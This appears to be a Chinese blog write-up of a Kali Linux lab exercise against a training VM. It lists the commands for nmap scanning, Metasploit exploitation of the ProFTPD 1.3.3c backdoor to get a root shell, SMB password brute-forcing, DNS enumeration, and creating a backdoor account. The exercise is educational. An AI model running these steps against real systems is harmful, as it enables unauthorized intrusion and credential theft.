kali實驗過程與結果講解

2021-09-26 10:00:15 字數 3171 閱讀 6501

前期準備:開啟虛擬機器,開啟完畢後會顯示伺服器的ip

1、 收集此伺服器的資訊。

1) 開放的埠及服務

nmap 192.168.100.100
通過命令檢視目標ip開放的埠和服務,從而獲得埠資訊和開放的服務資訊

2) 此伺服器主機名

nmap -sv 192.168.100.100
-sv 探測埠服務版本並且可以檢視該伺服器的主機名

3. 使用metasploit對此伺服器某服務後門漏洞進行利用,並獲得最高許可權

1)該存在後門漏洞的服務為proftpd後門漏洞

nmap -st -pn -a 192.168.100.100

seach proftpd

2) 漏洞利用與獲得最高許可權過程

通過對各個服務進行查詢後門漏洞,最終發現proftpd_133c_backdoor的後門漏洞並進行利用攻擊

set payload cmd/unix/bind_perl選擇攻擊漏洞利用模組

set rhost 192.168.100.100作為目標靶機的ip位址

set lport 21為目標埠

show options檢視列出滲透攻擊模組或模組的所有配置引數

exploit進行滲透攻擊

然後遇到500 invalid command的報錯,這時需要進行提權

help acid*****ez
輸入之後,成功滲透進入靶機 shell輸入後可以進入命令列,接著輸入sudo -s切換到root使用者介面,獲得最高許可權成功。

4:對此伺服器某存在弱口令的服務進行密碼爆破

1) 該存在弱口令的服務為smb

驗證存在弱口令的服務為smb,接著進行登入爆破

use auxiliary/scanner/smb/smb_login
2)口令爆破過程

現在進行下一步的操作爆破

set rhosts 192.168.100.100進行設定目標ip靶機

set user_file /root/dic.txt設定使用者名稱的txt文字錄入

set pass_file /root/dic.txt設定使用者密碼的txt文字錄入

最後進行爆破run,等待爆破結果發現

success ——user:admin

就是成功爆破的使用者名稱與密碼

3)使用獲得的密碼登入該服務,並找出key檔案

進入我的電腦,輸入靶機ip:\192.168.100.100進入登入,並輸入使用者名稱與密碼,檢視到三個檔案目錄的opt,最後找到key檔案存在。

5. 此伺服器開放了dns伺服器提供class.sec網域名稱的解析,請進行資訊收集

1)查詢該網域名稱的ns和mx記錄

dig @192.168.100.100 class.sec mx

dig @192.168.100.100 class.sec ns

通過dig命令查詢網域名稱的ns和mx記錄,

mx:郵件伺服器資源記錄,記錄乙個域的郵件伺服器的網域名稱

ns:名字伺服器資源記錄,記錄乙個域的權威網域名稱伺服器的網域名稱

2) 使用工具對該網域名稱解析進行窮舉

fierce -dnsserver 192.168.100.100 -dns class.sec
fierce 工具主要是對子網域名稱進行掃瞄和收集資訊,使用fierce工具獲得乙個目標主機上所有ip位址和主機資訊

6:使用上述漏洞利用得到的許可權建立乙個帳號,要求如下:

1) 以「學號+姓名首字母」命名

利用第三題的proftpd_133c_backdoor的後門漏洞再次進行滲透, 獲取最高許可權後的root進行漏洞利用

useradd 666nmz使用者名稱的命名為學號後三位+姓名首字母

passwd 666nmz選擇設定密碼的使用者,並設定密碼

輸出密碼後,再次輸出密碼進行確認

2) uid為學號後3位

usermod -u 666 666nmz
這行命令就是設定uid為學號後三位的命令,在root使用者下進行設定後,su切換到666nmz使用者,輸入id命令檢視666nmz使用者下的uid為666(666nmz)

7. 使用ssh登入該賬戶

1)登入成功後顯示的資訊

ssh [email protected]

進行ssh服務登入,請求登入後會提示是否繼續登入(yes or no),確定登入後需要輸出密碼,密碼成功後完成。

2) 檢視/etc/passwd檔案

在ssh登入後的root使用者下檢視/etc/passwd檔案

Kali 下的 ARP斷網實驗實現過程

位址解析協議是建立在網路中各個主機互相信任的基礎上的,網路上的主機可以自主傳送arp應答訊息,其他主機收到應答報文時 不會檢測該報文的真實性 就會將其記入本機arp快取 由此攻擊者就可以向某一主機傳送偽arp應答報文,使其傳送的資訊無法到達預期的主機或到達錯誤的主機,這就構成了乙個arp欺騙 ifc...

ETL方法與過程講解

1 etl基本概念和術語 1.1 etl extract transform load的縮寫,資料抽取 extract 轉換 transform 裝載 load 的過程。1.2 dw datawarehousing,根據bill.inmon的定義,資料倉儲是面向主題的 整合的 穩定的 隨時間變化的,...

kali滲透測試與教學筆記的實驗環境

主要參考metasploit魔鬼訓練營 配置需要注意的特別是 閘道器伺服器linux metasploitable有兩個網絡卡,乙個連線dmz區,乙個連線內網,配置如下 開啟 etc sysctl.conf,開啟其中的資料報 功能 找到net.ipv4.ip forward 1語句,把前面的 號去掉...